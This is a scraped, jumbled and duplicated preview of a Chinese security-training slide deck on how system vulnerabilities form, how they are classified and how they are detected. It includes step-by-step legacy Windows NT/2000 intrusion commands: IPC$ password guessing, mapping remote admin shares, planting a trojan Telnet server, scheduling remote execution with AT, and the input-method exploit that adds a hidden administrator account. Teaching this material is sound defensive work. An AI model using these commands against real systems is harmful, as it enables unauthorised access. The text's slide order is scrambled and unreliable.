系统安全漏洞与安全检测60页PPT
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
c:\>net use \\xxx.xxx.xxx.xxx\ipc$ /user:< name> < passwd>
也可以使用脚本语句:
open(IPC, "net use \\xxx.xxx.xxx.xxx\ipc$ /user:< name> < passwd> ");
看看目标计算机上有那些共享的资源可以用下面命令:
(3)用远程控制终端
输入法漏洞
描述:输入法漏洞可以说是中文Windows2000推出后
的第一个致命漏洞,通过它我们可以做许多的事情, 包括建立用户.
测试1:使用文件类型编辑创建管理员用户 :
1.开机到登陆界面调出输入法,如全拼->帮助->操 作指南,跳出输入法指南帮助文件
2.右击"选项"按钮,选择"跳至url" 3.在跳至URL上添上"c:\",其它的也可. 4.帮助的右边会进入c: 5.按帮助上的"选项"按钮. 6.选"internet"选项.会启动文件类型编辑框.
13.返回,重新以aboutnt用户登录即可。
• IPC$共享漏洞
描述:危害性大,主要是和其它漏洞一块使用
IPC$(Inter-Process Communication)共享是NT计算机上的 一个标准的隐含共享,它是用于服务器之间的通信的。 NT计算机通过使用这个共享来和其他的计算机连接得 到不同类型的信息的。常常可利用这一点来,通过使 用空的IPC会话进行攻击。
c:\>net time \\202.1.1.1 这个命:\>net use \\202.1.1.1\ipc$ ”” /user:”admin” 此时,cmd会提示命令成功完成。这样你就和202.1.1.1建立了 IPC连接。
c:\>copy server.exe \\202.1.1.1\admin$ 上传server.exe到202.1.1.1的winnt目录,因为winnt目录里的东西 比较多,管理员不容易发现,所以我们把server.exe上传到里面。 Server.exe是janker写的winshell生成的程序,WinShell是一个运行 在Windows平台上的Telnet服务器软件。
目录 漏洞的形成 漏洞的分类 漏洞的检测工具 漏洞的防范办法 安全检测的目的 常见安全检测的内容 专业安全检测的内容
一、漏洞形成
后门:大型软件、系统的编写,是许多程序员共同完成。 他们是将一个软件或系统分成若干板块,分工编写,然 后再汇总,测试。最后,修补,发布。在软件汇总时, 为了测试方便,程序员总会留有后门;在测试以后再进 行修补……这些后门,如果一旦疏忽(或是为某种目的 故意留下),或是没有发现,软件发布后自然而然就成 了漏洞。 程序若干板块之间的空隙:这里很容易出现连程序员 的都没想到的漏洞!
c:\>net view \\[目标计算机的IP地址]
一旦IPC$共享顺利完成,下一个命令是:
c:\>net use g: \\xxx.xxx.xxx.xxx\c$
得到了C$共享,并将该目录映射到g:,键入:
c:\>dir g: /p
就能显示这个目录的所有内容。
测试 2:通过测试1来上传木马控制服务器
蓝盾安全小组
网络协议:网络协议有TCP、UDP、ICMP、IGMP等。其 实,他们本来的用途是好的,但却被别人用于不乏的活动: 例如,ICMP本来是用于寻找网络相关信息,后来却被用于 网络嗅探和攻击;TCP本来是用于网络传输,后来却被用 于泄漏用户信息。 程序员自身的素质:程序员的自身对网络安全认识的不够, 写出的程序自身就有漏洞。
/add & C:\WINNT\system32\cmd.exe /c net localgrou p administrators aboutnt /add 完成后退出 11.将c:\的某个文件如"pipi.txt"改为"pipi.txt.mayi",然 后双击打开这个文件. 12.通常这个文件是打不开的,系统运行一会便没有了 提示,但这时我们已经将用户mayi加上了,权限是管理 员.
二、系统漏洞的分类
操作系统漏洞 应用平台的漏洞 应用系统的漏洞 网络系统漏洞
操作系统的漏洞
弱口令
弱口令就是用户的操作密码过于简单(如‘123’)。
描述:本漏洞的危害性极强,它可以对系统服务器
作任何的操作。主要是因为管理员的安全意识不足。
测试目的:用本漏洞控制服务器系统。
(1)我们可以用爆力破解工具或扫描器(XSCAN 等)对机器进行扫描,可得到管理员密码。只要拥 有管理员级权限,就能完全共享应用对方的机器, 如下面的命令会将对方的C盘映射为自己的X盘: c:\>net use x: \\[目标主机的IP地址]\c$ "[密码]" /user:"[用户名]" 其中"c$"为系统默认共享,依此类推,同样可以共 享对方的"d$","e$
7.新建一个文件类型,如一个you文件类型,在跳出的文
件后缀中添上"you".确定.
8.选中文件类型框中的"you"文件类型,点击下面的"高 级按钮",会出现文件操作对话框. 9.新建一种文件操作,操作名任意写,如"ppp" 10.该操作执行的命令如下:
C:\WINNT\system32\cmd.exe /c net user mayi 123456
测试1:通过本漏洞猜测用户密码
c:\>net use \\[目标机器的IP地址]\ipc$ /user:< name> < passwd>
当这个连接建立后,要将username和password送去加以
确认。如果你以"Administrator"登录,则需要进行口令猜测。
可以重复使用'net'命令,进行username和password猜测:
(2)运行AT命令 。 C:\>net start schedule Schedule 正在启动服务..... Schedulw 服务启动成功。 AT的语法: AT [\\computername] [time] "command" 比如:
AT [\\computername] [time] runnc.bat
也可以使用脚本语句:
open(IPC, "net use \\xxx.xxx.xxx.xxx\ipc$ /user:< name> < passwd> ");
看看目标计算机上有那些共享的资源可以用下面命令:
(3)用远程控制终端
输入法漏洞
描述:输入法漏洞可以说是中文Windows2000推出后
的第一个致命漏洞,通过它我们可以做许多的事情, 包括建立用户.
测试1:使用文件类型编辑创建管理员用户 :
1.开机到登陆界面调出输入法,如全拼->帮助->操 作指南,跳出输入法指南帮助文件
2.右击"选项"按钮,选择"跳至url" 3.在跳至URL上添上"c:\",其它的也可. 4.帮助的右边会进入c: 5.按帮助上的"选项"按钮. 6.选"internet"选项.会启动文件类型编辑框.
13.返回,重新以aboutnt用户登录即可。
• IPC$共享漏洞
描述:危害性大,主要是和其它漏洞一块使用
IPC$(Inter-Process Communication)共享是NT计算机上的 一个标准的隐含共享,它是用于服务器之间的通信的。 NT计算机通过使用这个共享来和其他的计算机连接得 到不同类型的信息的。常常可利用这一点来,通过使 用空的IPC会话进行攻击。
c:\>net time \\202.1.1.1 这个命:\>net use \\202.1.1.1\ipc$ ”” /user:”admin” 此时,cmd会提示命令成功完成。这样你就和202.1.1.1建立了 IPC连接。
c:\>copy server.exe \\202.1.1.1\admin$ 上传server.exe到202.1.1.1的winnt目录,因为winnt目录里的东西 比较多,管理员不容易发现,所以我们把server.exe上传到里面。 Server.exe是janker写的winshell生成的程序,WinShell是一个运行 在Windows平台上的Telnet服务器软件。
目录 漏洞的形成 漏洞的分类 漏洞的检测工具 漏洞的防范办法 安全检测的目的 常见安全检测的内容 专业安全检测的内容
一、漏洞形成
后门:大型软件、系统的编写,是许多程序员共同完成。 他们是将一个软件或系统分成若干板块,分工编写,然 后再汇总,测试。最后,修补,发布。在软件汇总时, 为了测试方便,程序员总会留有后门;在测试以后再进 行修补……这些后门,如果一旦疏忽(或是为某种目的 故意留下),或是没有发现,软件发布后自然而然就成 了漏洞。 程序若干板块之间的空隙:这里很容易出现连程序员 的都没想到的漏洞!
c:\>net view \\[目标计算机的IP地址]
一旦IPC$共享顺利完成,下一个命令是:
c:\>net use g: \\xxx.xxx.xxx.xxx\c$
得到了C$共享,并将该目录映射到g:,键入:
c:\>dir g: /p
就能显示这个目录的所有内容。
测试 2:通过测试1来上传木马控制服务器
蓝盾安全小组
网络协议:网络协议有TCP、UDP、ICMP、IGMP等。其 实,他们本来的用途是好的,但却被别人用于不乏的活动: 例如,ICMP本来是用于寻找网络相关信息,后来却被用于 网络嗅探和攻击;TCP本来是用于网络传输,后来却被用 于泄漏用户信息。 程序员自身的素质:程序员的自身对网络安全认识的不够, 写出的程序自身就有漏洞。
/add & C:\WINNT\system32\cmd.exe /c net localgrou p administrators aboutnt /add 完成后退出 11.将c:\的某个文件如"pipi.txt"改为"pipi.txt.mayi",然 后双击打开这个文件. 12.通常这个文件是打不开的,系统运行一会便没有了 提示,但这时我们已经将用户mayi加上了,权限是管理 员.
二、系统漏洞的分类
操作系统漏洞 应用平台的漏洞 应用系统的漏洞 网络系统漏洞
操作系统的漏洞
弱口令
弱口令就是用户的操作密码过于简单(如‘123’)。
描述:本漏洞的危害性极强,它可以对系统服务器
作任何的操作。主要是因为管理员的安全意识不足。
测试目的:用本漏洞控制服务器系统。
(1)我们可以用爆力破解工具或扫描器(XSCAN 等)对机器进行扫描,可得到管理员密码。只要拥 有管理员级权限,就能完全共享应用对方的机器, 如下面的命令会将对方的C盘映射为自己的X盘: c:\>net use x: \\[目标主机的IP地址]\c$ "[密码]" /user:"[用户名]" 其中"c$"为系统默认共享,依此类推,同样可以共 享对方的"d$","e$
7.新建一个文件类型,如一个you文件类型,在跳出的文
件后缀中添上"you".确定.
8.选中文件类型框中的"you"文件类型,点击下面的"高 级按钮",会出现文件操作对话框. 9.新建一种文件操作,操作名任意写,如"ppp" 10.该操作执行的命令如下:
C:\WINNT\system32\cmd.exe /c net user mayi 123456
测试1:通过本漏洞猜测用户密码
c:\>net use \\[目标机器的IP地址]\ipc$ /user:< name> < passwd>
当这个连接建立后,要将username和password送去加以
确认。如果你以"Administrator"登录,则需要进行口令猜测。
可以重复使用'net'命令,进行username和password猜测:
(2)运行AT命令 。 C:\>net start schedule Schedule 正在启动服务..... Schedulw 服务启动成功。 AT的语法: AT [\\computername] [time] "command" 比如:
AT [\\computername] [time] runnc.bat